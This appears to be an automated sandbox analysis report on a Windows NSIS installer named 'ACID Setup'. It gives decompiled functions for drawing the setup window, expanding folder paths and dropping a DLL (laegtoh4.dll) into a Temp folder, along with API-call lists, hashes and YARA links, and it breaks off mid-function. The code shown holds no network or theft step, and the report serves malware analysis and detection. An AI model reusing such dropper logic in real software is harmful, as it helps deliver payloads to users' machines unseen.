                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042C0A8,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040586F
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405881
                                                • GlobalFree.KERNEL32 ref: 00405888
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040588F
                                                  • Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
                                                  • Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                • API String ID: 3633819597-1342836890
                                                • Opcode ID: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
                                                • Instruction ID: a1a0e0f9ef0cd972c6a82fac1fe668e7cfe11d0cfdfeabcff745320237112b5d
                                                • Opcode Fuzzy Hash: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
                                                • Instruction Fuzzy Hash: C0411372640B11BBE2203B219C89F6B3A5CDF85755F144536FE05F62D2EA38AC018EBD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f428;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "ACID Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f424;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,ACID Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: ACID Setup$F
                                                • API String ID: 941294808-2802796568
                                                • Opcode ID: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
                                                • Instruction ID: dcdf37c0a61dcd20993090bd1158cb83bc568099e5e3d0b1b0767e43f48950cc
                                                • Opcode Fuzzy Hash: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
                                                • Instruction Fuzzy Hash: 2C41AA71804249AFCB058FA5CD459BFBFB9FF44324F00802AF951AA1A0C778EA54DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004059FD, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 180stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E004059FD(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				intOrPtr _t71;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t71 =  *0x42ebfc; // 0x5bda93
					_t61 =  *(_t71 - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x42f458;
				_t35 = 0x42e3c0;
				_t79 = 0x42e3c0;
				if(_a4 - 0x42e3c0 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059FD(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x42e3c0;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x430000;
							E004059DB(_t79, (_t86 << 0xa) + 0x430000);
						} else {
							E00405939(_t79,  *0x42f424);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405C17(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059DB(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x42f424,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E00405238(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059DB(_a4, _t35);
			}























                                                0x00405a04
                                                0x00405a0b
                                                0x00405a0d
                                                0x00405a1c
                                                0x00405a1c
                                                0x00405a26
                                                0x00405a28
                                                0x00405a2f
                                                0x00405a37
                                                0x00405a3d
                                                0x00405a40
                                                0x00405a40
                                                0x00405bf1
                                                0x00405bf1
                                                0x00405bf5
                                                0x00405bf8
                                                0x00000000
                                                0x00000000
                                                0x00405a4d
                                                0x00405a53
                                                0x00000000
                                                0x00000000
                                                0x00405a59
                                                0x00405a5a
                                                0x00405a5d
                                                0x00405be4
                                                0x00405bee
                                                0x00405bf0
                                                0x00405bf0
                                                0x00405be6
                                                0x00405be8
                                                0x00405bea
                                                0x00405beb
                                                0x00405beb
                                                0x00000000
                                                0x00405be4
                                                0x00405a63
                                                0x00405a67
                                                0x00405a77
                                                0x00405a7e
                                                0x00405a81
                                                0x00405a84
                                                0x00405a86
                                                0x00405a89
                                                0x00405a8c
                                                0x00405a8d
                                                0x00405a91
                                                0x00405a94
                                                0x00405b8f
                                                0x00405b93
                                                0x00405bc3
                                                0x00405bc7
                                                0x00405bcc
                                                0x00405bd0
                                                0x00405bd0
                                                0x00405bd5
                                                0x00405bdb
                                                0x00405bdd
                                                0x00000000
                                                0x00405bdd
                                                0x00405b95
                                                0x00405b98
                                                0x00405bad
                                                0x00405bb4
                                                0x00405b9a
                                                0x00405ba1
                                                0x00405ba1
                                                0x00405bbc
                                                0x00405bbf
                                                0x00405b87
                                                0x00405b88
                                                0x00405b88
                                                0x00000000
                                                0x00405bbf
                                                0x00405a9a
                                                0x00405a9e
                                                0x00405aa3
                                                0x00405aa4
                                                0x00405aa7
                                                0x00405ab2
                                                0x00405ab5
                                                0x00405ab8
                                                0x00405ad1
                                                0x00405ad4
                                                0x00405b01
                                                0x00405b04
                                                0x00405b14
                                                0x00405b17
                                                0x00000000
                                                0x00000000
                                                0x00405b1f
                                                0x00000000
                                                0x00405b1f
                                                0x00405b0c
                                                0x00000000
                                                0x00405b0c
                                                0x00405ae6
                                                0x00405aeb
                                                0x00405aee
                                                0x00000000
                                                0x00000000
                                                0x00405afa
                                                0x00000000
                                                0x00405aba
                                                0x00405aca
                                                0x00405b25
                                                0x00405b25
                                                0x00405b28
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405b28
                                                0x00405aa9
                                                0x00405aa9
                                                0x00405b2a
                                                0x00405b2a
                                                0x00405b31
                                                0x00405b35
                                                0x00405b35
                                                0x00405b36
                                                0x00405b39
                                                0x00405b45
                                                0x00405b4b
                                                0x00405b4d
                                                0x00405b6c
                                                0x00405b6c
                                                0x00000000
                                                0x00405b6c
                                                0x00405b53
                                                0x00405b5c
                                                0x00405b5f
                                                0x00405b64
                                                0x00405b68
                                                0x00000000
                                                0x00000000
                                                0x00405b6f
                                                0x00405b6f
                                                0x00405b6f
                                                0x00405b73
                                                0x00405b76
                                                0x00405b78
                                                0x00405b7c
                                                0x00405b82
                                                0x00405b82
                                                0x00405b7c
                                                0x00000000
                                                0x00405b76
                                                0x00405aa7
                                                0x00405bfe
                                                0x00405c08
                                                0x00405c14
                                                0x00405c14
                                                0x00000000

                                                APIs
                                                • SHGetSpecialFolderLocation.SHELL32(00404DB6,7519EA30,00000006,0042A080,00000000,00404DB6,0042A080,00000000), ref: 00405B45
                                                • SHGetPathFromIDListA.SHELL32(7519EA30,YVfgfgfgfgfg), ref: 00405B53
                                                • lstrcatA.KERNEL32(YVfgfgfgfgfg,00000000), ref: 00405B82
                                                • lstrlenA.KERNEL32(YVfgfgfgfgfg,00000006,0042A080,00000000,00404DB6,0042A080,00000000,00000000,0041A058,7519EA30), ref: 00405BD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$YVfgfgfgfgfg
                                                • API String ID: 4227507514-464798787
                                                • Opcode ID: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
                                                • Instruction ID: 13347c9ab72858fb5eaf67a64ac525bbdc509f35e98fc7f159111bcae2296393
                                                • Opcode Fuzzy Hash: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
                                                • Instruction Fuzzy Hash: 0B514471A04A40AADF206B648880B7F3BB4DB55324F24823BF951B92D2C77CB941DF5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E004026FA(void* __eflags) {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405554(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054E8(E004059DB("C:\Users\alfons\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll", "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a040;
				} else {
					_push(0x40a040);
					E004059DB();
				}
				E00405C17(_t55);
				_t28 = E004056AC(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x42f42c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E0040311B(_t48);
						E004030E9(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							E00402EBD( *((intOrPtr*)(_t60 - 0x20)), _t48, _t58,  *(_t60 - 0x1c));
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E0040568C( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD(0xffffffff,  *(_t60 + 8), _t48, _t48);
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a040;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                                0x004026fb
                                                0x00402707
                                                0x0040270a
                                                0x00402711
                                                0x00402712
                                                0x00402737
                                                0x0040273c
                                                0x00402714
                                                0x00402719
                                                0x0040271a
                                                0x0040271a
                                                0x00402742
                                                0x0040274f
                                                0x00402757
                                                0x0040275a
                                                0x00402760
                                                0x0040276e
                                                0x00402773
                                                0x00402777
                                                0x0040277a
                                                0x00402783
                                                0x0040278f
                                                0x00402793
                                                0x00402796
                                                0x004027a0
                                                0x004027bf
                                                0x004027ac
                                                0x004027b4
                                                0x004027b7
                                                0x004027bc
                                                0x004027bc
                                                0x004027c6
                                                0x004027c6
                                                0x004027d8
                                                0x004027df
                                                0x004027f1
                                                0x004027f1
                                                0x004027f7
                                                0x004027fd
                                                0x004027fd
                                                0x00402807
                                                0x00402808
                                                0x0040280c
                                                0x0040280e
                                                0x00402814
                                                0x00402814
                                                0x0040281b
                                                0x004021e8
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                • GlobalFree.KERNEL32 ref: 004027C6
                                                • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                • GlobalFree.KERNEL32 ref: 004027DF
                                                • CloseHandle.KERNEL32(?), ref: 004027F7
                                                • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                  • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,ACID Setup,NSIS Error), ref: 004059E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                                • API String ID: 3508600917-3921208636
                                                • Opcode ID: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
                                                • Instruction ID: e918ecff61003bd4e53df21424f32a66ffcc7178d15be7bffdb357a79f3add81
                                                • Opcode Fuzzy Hash: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
                                                • Instruction Fuzzy Hash: 9C31AEB1C00118BBDF116FA5CD89EAF7A69EF04324B20823AF914B72D1C77C5D419BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C17, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405C17(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405554(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405513("*?|<>/\":", _t5))) == 0) {
							E0040568C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                0x00405c19
                                                0x00405c21
                                                0x00405c35
                                                0x00405c35
                                                0x00405c3b
                                                0x00405c48
                                                0x00405c48
                                                0x00405c49
                                                0x00405c4b
                                                0x00405c4f
                                                0x00405c51
                                                0x00405c5a
                                                0x00405c5c
                                                0x00405c76
                                                0x00405c7e
                                                0x00405c7e
                                                0x00405c83
                                                0x00405c85
                                                0x00405c87
                                                0x00405c8b
                                                0x00405c8c
                                                0x00405c8f
                                                0x00405c97
                                                0x00405c99
                                                0x00405c9d
                                                0x00000000
                                                0x00000000
                                                0x00405ca3
                                                0x00405ca8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ca8
                                                0x00405cad

                                                APIs
                                                • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C17, 00405C18
                                                • *?|<>/":, xrefs: 00405C5F
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                • API String ID: 589700163-879122614
                                                • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                • Instruction ID: b197c2bef29f723973a647164ed9bfba67e7b184e87579fa7c6e082c99ea6b19
                                                • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                • Instruction Fuzzy Hash: B8118F9180DB952DFB3226284D44BBB6F89CB97760F18057BE8C4722C2C67C5C829B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403E2A, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403E2A(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
